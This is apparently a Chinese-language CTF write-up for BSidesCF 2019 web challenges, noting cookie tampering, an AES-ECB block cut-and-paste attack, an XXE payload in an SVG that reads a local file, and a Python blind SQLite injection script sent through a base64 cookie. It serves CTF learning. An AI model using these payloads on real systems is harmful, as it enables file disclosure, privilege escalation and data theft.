BSidesCF 2019

Kookie

... 用user cookie登上去后抓包吧cookie username改成admin就拿到flag了?

Pick Tac Toe

还是Burp Suite抓包 修改move的参数,棋子可以强制落

Svg Magic

Svg应该想到XXE的 就是这个路径...

需要好好积累

/proc/self 表示当前进程目录

Exp

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

Mixer

AES ECB 构造密文

根据提示is_admin是个整数

修改cookie:user后出现json串

猜测构造

b0c704f59962d7f398084dee08e152d1 {"first_name":"A
33a6d524a13d47f6a4dd63b5e72ee6eb 1.00000000000000
9ba3107987da6eeb016e3c48dbd7c0bf ","last_name":"E
a36daac88addff9f1ccfd106e564f2b8 ki","is_admin":0
1d440a6472a927fc8e26e13b39e31fc2 }



b0c704f59962d7f398084dee08e152d1 {"first_name":"A
33a6d524a13d47f6a4dd63b5e72ee6eb 1.00000000000000
9ba3107987da6eeb016e3c48dbd7c0bf ","last_name":"E
4be6c45f5785fddad8e6c21e6ecdd0ac kii","is_admin":
33a6d524a13d47f6a4dd63b5e72ee6eb 1.00000000000000
1d440a6472a927fc8e26e13b39e31fc2 }

参考链接

https://ctf-wiki.github.io/ctf-wiki/crypto/blockcipher/mode/ecb-zh/

Sequel

Cookie里面可以注SQL

但是最后发现是SQLite,之前在MYSQL上能跑的脚本还跑不出来。。。

贴个脚本学习一下 利用Exist

#coding=utf-8
import requests
import base64
import string
import sys

url="http://61dcd273-6f78-4432-a87c-a51cf39a5593.node3.buuoj.cn/sequels"
#sql="SELECT name FROM sqlite_master WHERE name "
#notes reviews reviews sqlite userinfo
sql = "SELECT username FROM userinfo WHERE name"
out = ""

while True:
    for letter in string.printable:
        tmp = out + letter
        if(tmp[0]=='n'):
            continue
        if(tmp[0]=='r'):
            continue
        if(tmp[0]=='s'):
            continue
        payload = r'{{"username":"\" OR EXISTS({0} LIKE \"{1}%\" limit 1) OR \"","password":"guest"}}'.format(sql,tmp)
                                                            #匹配以{1}开头的数据表
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

        r = requests.get(url, cookies={"1337_AUTH" : payload})
        if (tmp[-1]=="%") :
            exit(0)
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break
© Eki's CTF-notes 2019-2020 CC-by-nc-sa 4.0。 all right reserved,powered by Gitbook本网站最后修订于: 2021-03-09 16:35:16

results matching ""

    No results matching ""